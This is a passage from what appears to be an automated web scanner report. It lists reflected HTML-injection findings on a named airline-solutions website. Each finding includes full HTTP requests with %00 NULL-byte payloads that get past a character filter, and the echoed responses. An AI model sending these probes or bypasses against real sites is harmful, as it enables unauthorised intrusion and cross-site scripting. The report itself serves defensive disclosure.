GET /home/ascend/?%00fe06e<a>db887c7418b=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321370; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>db887c7418b=1">?%00fe06e<a>db887c7418b=1</a> ...[SNIP]...
3.15. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/archive
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00940ea<a>08244679985 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 940ea<a>08244679985 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/archive?%00940ea<a>08244679985=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321532; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>08244679985=1">archive?%00940ea<a>08244679985=1</a> ...[SNIP]...
3.16. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/archive
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006fa94"><a>536da431cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa94"><a>536da431cfe in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/archive?%006fa94"><a>536da431cfe=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321532; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/archive?%006fa94"><a>536da431cfe=1"> ...[SNIP]...
3.17. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/archive/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b09a0"><a>625cef8b535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b09a0"><a>625cef8b535 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/archive/?%00b09a0"><a>625cef8b535=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321342; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/archive/?%00b09a0"><a>625cef8b535=1"> ...[SNIP]...
3.18. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/archive/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0056b2f<a>e425790b66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b2f<a>e425790b66b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/archive/?%0056b2f<a>e425790b66b=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321342; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>e425790b66b=1">?%0056b2f<a>e425790b66b=1</a> ...[SNIP]...
3.19. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008a5cb<a>8f6a559e1b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a5cb<a>8f6a559e1b8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/contact?%008a5cb<a>8f6a559e1b8=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321540; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>8f6a559e1b8=1">contact?%008a5cb<a>8f6a559e1b8=1</a> ...[SNIP]...
3.20. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00db425"><a>741209e189c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db425"><a>741209e189c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/contact?%00db425"><a>741209e189c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321540; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/contact?%00db425"><a>741209e189c=1"> ...[SNIP]...
3.21. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00666b7<a>50bee8d5c60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 666b7<a>50bee8d5c60 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/contact/?%00666b7<a>50bee8d5c60=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321376; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>50bee8d5c60=1">?%00666b7<a>50bee8d5c60=1</a> ...[SNIP]...
3.22. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004de66"><a>0fefd7fbea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4de66"><a>0fefd7fbea2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/contact/?%004de66"><a>0fefd7fbea2=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321376; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/contact/?%004de66"><a>0fefd7fbea2=1"> ...[SNIP]...
3.23. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/current_issue
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a22d0<a>06115c6fe74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a22d0<a>06115c6fe74 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/current_issue?%00a22d0<a>06115c6fe74=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321374; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>06115c6fe74=1">current issue?%00a22d0<a>06115c6fe74=1</a> ...[SNIP]...
3.24. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/current_issue
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00831a1"><a>5e23834186a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 831a1"><a>5e23834186a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/current_issue?%00831a1"><a>5e23834186a=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321374; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/current_issue?%00831a1"><a>5e23834186a=1"> ...[SNIP]...
3.25. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/current_issue/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a38d2<a>7129be221ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a38d2<a>7129be221ae in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/ascend/current_issue/?%00a38d2<a>7129be221ae=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321334; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>7129be221ae=1">?%00a38d2<a>7129be221ae=1</a> ...[SNIP]...
3.26. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/ascend/current_issue/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f7df5"><a>b84f3cf75c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7df5"><a>b84f3cf75c1 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
